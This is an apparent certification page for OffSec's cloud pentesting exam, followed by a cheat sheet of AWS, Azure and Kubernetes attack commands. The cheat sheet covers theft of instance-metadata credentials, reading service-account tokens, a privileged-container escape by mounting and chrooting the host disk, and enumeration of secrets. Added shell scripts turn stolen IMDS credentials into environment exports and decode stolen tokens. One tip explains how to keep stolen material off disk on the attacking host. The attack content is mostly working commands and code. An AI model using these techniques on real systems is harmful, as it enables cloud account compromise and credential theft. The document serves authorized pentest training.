OCLP
OffSec

Offensive Security Cloud Pentester

Advanced | 48hr exam | Pass: Passing | $1,499

Cloud security assessment — AWS, Azure, GCP attack paths.

Issuer: OffSec
Format: 48hr exam
Duration: 48 hours
Pass Score: Passing
Valid For: 3y
Cheat Sheets
Cloud Enumeration & Attack Reference

AWS Enumeration

# Identity
aws sts get-caller-identity
aws iam get-user
aws iam list-attached-user-policies --user-name 
aws iam list-user-policies --user-name 
# v1 is not necessarily the live version: read DefaultVersionId from `aws iam get-policy --policy-arn ...` first
aws iam get-policy-version --policy-arn  --version-id v1

# Enumerate all
aws iam list-users; aws iam list-roles; aws iam list-groups
aws ec2 describe-instances --query 'Reservations[*].Instances[*].[InstanceId,PublicIpAddress,Tags]' --output table
aws s3 ls; aws s3 ls s3://bucket-name --recursive
aws lambda list-functions
aws secretsmanager list-secrets; aws secretsmanager get-secret-value --secret-id 

AWS IMDSv1 — Metadata Theft

# From EC2 instance (IMDSv1 — no token required)
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# The call above lists the attached role name; append it to the same path to read the credential document:
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Returns: Code, AccessKeyId, SecretAccessKey, Token, Expiration (temporary creds; the session token is mandatory with ASIA keys)

# Configure stolen creds
aws configure set aws_access_key_id ASIA...
aws configure set aws_secret_access_key 
aws configure set aws_session_token 

# IMDSv2 (requires token; the PUT response has a default hop limit of 1, so it does not survive a container or NAT hop, which is what defeats most SSRF-based theft)
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/
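Turning the credential document into a usable session by hand is error-prone (the session token is easy to forget, and a detached role returns a document whose Code is not Success). The helper below is an added example, not code from the page or from OffSec: it fetches the document over IMDSv2 and converts it to export lines, refusing anything that is not Code=Success. The key, token and timestamps in SAMPLE_CREDS are constructed placeholders so the conversion can be exercised off-instance; fetch_imds_creds itself only works on an EC2 instance.

```shell
#!/bin/sh
# Added example (not from the page): IMDS credential document -> env exports.
# Values in SAMPLE_CREDS are CONSTRUCTED placeholders, not real credentials.

# Extract one string field from the flat IMDS JSON document given on stdin.
# Works on the pretty-printed form IMDS returns and on single-line JSON; no jq.
json_str() {
  sed -n 's/.*"'"$1"'"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p' | head -n 1
}

# Live fetch via IMDSv2: session token, then role name, then the document.
# Only works on an EC2 instance; not exercised by the constructed sample.
fetch_imds_creds() {
  tok=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
          -H "X-aws-ec2-metadata-token-ttl-seconds: 300") || return 1
  role=$(curl -s -H "X-aws-ec2-metadata-token: $tok" \
          "http://169.254.169.254/latest/meta-data/iam/security-credentials/" | head -n 1)
  [ -n "$role" ] || { echo "no instance role attached" >&2; return 1; }
  curl -s -H "X-aws-ec2-metadata-token: $tok" \
    "http://169.254.169.254/latest/meta-data/iam/security-credentials/$role"
}

# Convert a credential document ($1) into export lines. Fails unless the
# document reports Code=Success (role detached, 404 body, throttling page...).
creds_to_env() {
  doc="$1"
  code=$(printf '%s' "$doc" | json_str Code)
  [ "$code" = "Success" ] || { echo "unexpected Code: '$code'" >&2; return 1; }
  ak=$(printf '%s' "$doc" | json_str AccessKeyId)
  sk=$(printf '%s' "$doc" | json_str SecretAccessKey)
  st=$(printf '%s' "$doc" | json_str Token)
  exp=$(printf '%s' "$doc" | json_str Expiration)
  printf 'export AWS_ACCESS_KEY_ID=%s\n' "$ak"
  printf 'export AWS_SECRET_ACCESS_KEY=%s\n' "$sk"
  printf 'export AWS_SESSION_TOKEN=%s\n' "$st"
  printf '# expires %s (session token is mandatory for ASIA keys)\n' "$exp"
}

# Constructed sample in the exact shape IMDS returns.
SAMPLE_CREDS='{
  "Code" : "Success",
  "LastUpdated" : "2024-01-01T00:00:00Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIAEXAMPLE1234567",
  "SecretAccessKey" : "exampleSecretKeyDoNotUse",
  "Token" : "IQoJb3JpZ2luX2VjEXAMPLE",
  "Expiration" : "2024-01-01T06:00:00Z"
}'

# On a real instance: eval "$(creds_to_env "$(fetch_imds_creds)")"; aws sts get-caller-identity
creds_to_env "$SAMPLE_CREDS"
```

Prefer `eval` of these exports over `aws configure set`: the exports stay in the current shell and vanish with it, whereas `aws configure set` writes the stolen material to ~/.aws/credentials on the attacking host.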

Azure Enumeration

# Login & enumerate
az login; az account list --output table
az ad user list --output table
az ad group list --output table
az role assignment list --all --output table
az keyvault list; az keyvault secret list --vault-name 
az webapp list --output table
az storage account list

# Managed Identity token (from inside Azure resource)
curl "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" -H "Metadata: true"

# ROADtools (authenticate first; gather reads the saved token file)
roadrecon auth -u user@domain.com -p pass
roadrecon gather
roadrecon gui  # browse at http://localhost:5000

K8s Attack Commands

# Service account token (if inside pod)
cat /var/run/secrets/kubernetes.io/serviceaccount/token
cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt

# Use token to query API
APISERVER=https://kubernetes.default.svc
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
curl $APISERVER/api/v1/namespaces/default/secrets -H "Authorization: Bearer $TOKEN" --cacert /var/run/secrets/kubernetes.io/serviceaccount/ca.crt

# Privileged container escape
# If running privileged (host block devices are visible; the root disk name varies: sda1, vda1, nvme0n1p1, so take it from fdisk output):
fdisk -l; mkdir /mnt/host; mount /dev/sda1 /mnt/host; chroot /mnt/host bash

# kubectl (from outside)
kubectl get pods -A; kubectl get secrets -A
kubectl exec -it pod-name -- /bin/bash
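Both the Azure managed identity token from the metadata endpoint above and the Kubernetes service account token are JWTs, and their claims tell you what a stolen token is actually good for (which service account and namespace, which Azure resource identity, and whether it has already expired) before you spend any requests on it. The helper below is an added example, not code from the page or from OffSec: it decodes the payload segment with plain sed and base64 and pulls out individual claims. The two sample tokens are constructed locally with a fake signature; the GUIDs, names and resource path in them are placeholders, and the signature is deliberately not verified because this is inspection, not validation.

```shell
#!/bin/sh
# Added example (not from the page): inspect the claims of a bearer token
# (K8s service-account token or Azure managed-identity token, both JWTs).
# Sample tokens are CONSTRUCTED below with a fake signature; no jq needed.

# base64url -> bytes: restore the standard alphabet and the stripped padding.
b64url_decode() {
  s=$(tr -- '-_' '+/')
  case $(( ${#s} % 4 )) in
    2) s="$s==" ;;
    3) s="$s=" ;;
  esac
  printf '%s' "$s" | base64 -d
}

# The second dot-separated segment is the claims JSON. Signature is NOT checked.
jwt_payload() { printf '%s' "$1" | cut -d. -f2 | b64url_decode; }

# String claim by key (first match). Keys such as "name" repeat inside nested
# objects, so ask for unique ones: sub, namespace, xms_mirid, oid.
jwt_claim() {
  jwt_payload "$1" | sed -n 's/.*"'"$2"'"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p' | head -n 1
}

# Numeric claim by key (exp, iat, nbf).
jwt_num_claim() {
  jwt_payload "$1" | sed -n 's/.*"'"$2"'"[[:space:]]*:[[:space:]]*\([0-9][0-9]*\).*/\1/p' | head -n 1
}

# True when exp lies in the past: a token lifted from disk or a dump may be dead.
jwt_expired() {
  e=$(jwt_num_claim "$1" exp)
  [ -n "$e" ] && [ "$e" -le "$(date +%s)" ]
}

# --- constructed samples (placeholder GUIDs/names, fake signature) ----------
b64url_encode() { base64 | tr -d '\n=' | tr -- '+/' '-_'; }
HDR='{"alg":"RS256","typ":"JWT"}'
K8S_CLAIMS='{"aud":["https://kubernetes.default.svc"],"exp":1700000000,"iss":"https://kubernetes.default.svc","kubernetes.io":{"namespace":"prod","pod":{"name":"web-7d9f"},"serviceaccount":{"name":"web-sa"}},"sub":"system:serviceaccount:prod:web-sa"}'
AZ_CLAIMS='{"aud":"https://management.azure.com/","iss":"https://sts.windows.net/00000000-0000-0000-0000-000000000000/","exp":4102444800,"oid":"11111111-1111-1111-1111-111111111111","xms_mirid":"/subscriptions/22222222-2222-2222-2222-222222222222/resourcegroups/rg-web/providers/Microsoft.Compute/virtualMachines/vm-web01"}'
K8S_TOKEN="$(printf '%s' "$HDR" | b64url_encode).$(printf '%s' "$K8S_CLAIMS" | b64url_encode).fakesig"
AZ_TOKEN="$(printf '%s' "$HDR" | b64url_encode).$(printf '%s' "$AZ_CLAIMS" | b64url_encode).fakesig"

# Real use: K8S_TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
#           AZ_TOKEN=$(curl -s "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" -H "Metadata: true" | sed 's/.*"access_token":"\([^"]*\)".*/\1/')
echo "k8s sub:       $(jwt_claim "$K8S_TOKEN" sub)"
echo "k8s namespace: $(jwt_claim "$K8S_TOKEN" namespace)"
if jwt_expired "$K8S_TOKEN"; then echo "k8s token is EXPIRED"; fi
echo "az  identity:  $(jwt_claim "$AZ_TOKEN" xms_mirid)"
```

For the Azure token, xms_mirid names the resource whose managed identity you hold and aud names the API it was minted for; request a fresh token with a different resource= value rather than reusing one issued for ARM against Graph or Key Vault.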

Enumerate every region rather than trusting the CLI default: resources usually sit in us-east-1, but attackers park backdoors in less-monitored regions. Where an SCP or IAM policy restricts regions through the aws:RequestedRegion condition key, calls in those regions fail with an authorization error instead of returning empty results, so record a denied region separately from an empty one.
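A per-region sweep that keeps denied or disabled regions apart from empty ones, as an added example (not code from the page or from OffSec). It queries every region EC2 knows about, including opt-in ones, so a region that is not enabled or is blocked by an aws:RequestedRegion condition shows up as an error line rather than silently as "nothing here". The REGIONS and AWS_CMD variables are conventions of this script only: REGIONS lets you supply a list when ec2:DescribeRegions is denied, and AWS_CMD exists so the loop can be exercised without an AWS account.

```shell
#!/bin/sh
# Added example (not from the page): sweep all regions for EC2 instances.
# REGIONS (override list) and AWS_CMD (command to run, default aws) are
# conventions of this script only.
AWS_CMD="${AWS_CMD:-aws}"

# Region list: an explicit REGIONS override wins (handy when
# ec2:DescribeRegions is denied); otherwise ask EC2, including opt-in regions.
list_regions() {
  if [ -n "${REGIONS:-}" ]; then
    # unquoted on purpose: split the space-separated override into lines
    printf '%s\n' $REGIONS
  else
    "$AWS_CMD" ec2 describe-regions --all-regions \
      --query 'Regions[].RegionName' --output text | tr '\t' '\n'
  fi
}

# One describe call per region. A failing call (opt-in region not enabled,
# SCP/IAM deny via aws:RequestedRegion) goes to stderr as its own line instead
# of being confused with a region that simply has no instances.
sweep_ec2() {
  for r in $(list_regions); do
    if ids=$("$AWS_CMD" ec2 describe-instances --region "$r" \
               --query 'Reservations[].Instances[].InstanceId' --output text 2>/dev/null); then
      printf '%s: %s\n' "$r" "${ids:-none}"
    else
      printf '%s: DENIED-OR-DISABLED\n' "$r" >&2
    fi
  done
}

# Usage: sh sweep.sh sweep            (all regions EC2 reports)
#        REGIONS="us-east-1 eu-west-1" sh sweep.sh sweep
if [ "${1:-}" = "sweep" ]; then
  sweep_ec2
fi
```

The same loop works for any regional service (lambda list-functions, secretsmanager list-secrets, ec2 describe-snapshots --owner-ids self); IAM and S3 listings are global and need no loop, although each bucket still has a home region.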